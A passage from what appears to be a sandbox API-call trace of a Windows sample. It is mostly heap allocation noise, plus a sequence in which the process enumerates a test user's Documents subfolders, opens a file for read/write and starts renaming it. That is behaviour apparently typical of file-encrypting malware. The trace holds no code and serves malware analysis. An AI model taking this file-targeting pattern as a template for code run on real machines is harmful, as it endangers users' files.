hHeap=0xcd0000) returned 1 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.324] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.324] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.325] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.325] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.326] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.326] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4c1f0 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ba0 | out: hHeap=0xcd0000) returned 1 [0170.326] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.326] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.326] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4c1f0 | out: hHeap=0xcd0000) returned 1 [0170.327] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.327] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.327] PathFindFileNameW (pszPath="") returned="" [0170.327] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.327] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3392880, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x8ac14960, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x8ac14960, ftLastWriteTime.dwHighDateTime=0x1d5d9c7, nFileSizeHigh=0x0, nFileSizeLow=0x9a1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsTyr.mkv", cAlternateFileName="")) returned 0xffffffff [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0170.327] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.327] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.327] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.327] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.327] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.327] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.327] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.327] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.327] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.327] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.327] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.327] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.328] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.328] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.329] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.329] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.329] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.329] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.329] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.329] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.329] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.329] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.329] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.329] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2c00 [0170.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0170.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0170.329] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.329] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.329] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.330] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.330] PathFindFileNameW (pszPath="") returned="" [0170.330] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3392880, ftCreationTime.dwHighDateTime=0x1d5e5d5, ftLastAccessTime.dwLowDateTime=0x8ac14960, ftLastAccessTime.dwHighDateTime=0x1d5d9c7, ftLastWriteTime.dwLowDateTime=0x8ac14960, ftLastWriteTime.dwHighDateTime=0x1d5d9c7, nFileSizeHigh=0x0, nFileSizeLow=0x9a1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsTyr.mkv", cAlternateFileName="")) returned 0xffffffff [0170.330] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.330] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.330] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0170.330] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.330] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0170.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0170.330] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.330] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.330] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.330] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.330] PathFindFileNameW (pszPath="") returned="" [0170.330] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.331] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2c00 | out: hHeap=0xcd0000) returned 1 [0170.331] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.331] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.331] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned=".ini" [0170.331] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3330 | out: hHeap=0xcd0000) returned 1 [0170.331] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0170.331] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned=".vss" [0170.331] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.332] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=0) returned 1 [0170.332] CloseHandle (hObject=0x664) returned 1 [0170.332] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 